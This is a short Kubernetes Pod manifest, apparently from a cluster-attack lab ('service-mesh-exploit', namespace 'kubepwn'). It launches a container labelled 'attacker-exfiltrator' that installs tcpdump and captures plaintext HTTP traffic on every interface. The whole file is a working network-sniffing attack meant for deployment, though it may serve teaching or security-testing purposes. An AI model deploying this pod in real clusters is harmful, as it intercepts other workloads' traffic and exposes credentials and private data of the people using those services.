bonus/service-mesh-exploit/exfil.yaml
#exfil.yaml
apiVersion: v1
kind: Pod
metadata:
  name: exfil
  namespace: kubepwn
  labels:
    app: attacker-exfiltrator
spec:
  containers:
  - name: sniffer
    image: nicolaka/netshoot
    command: ["/bin/sh", "-c"]
    args:
      - apk update && apk add tcpdump && tcpdump -i any port 80 -A
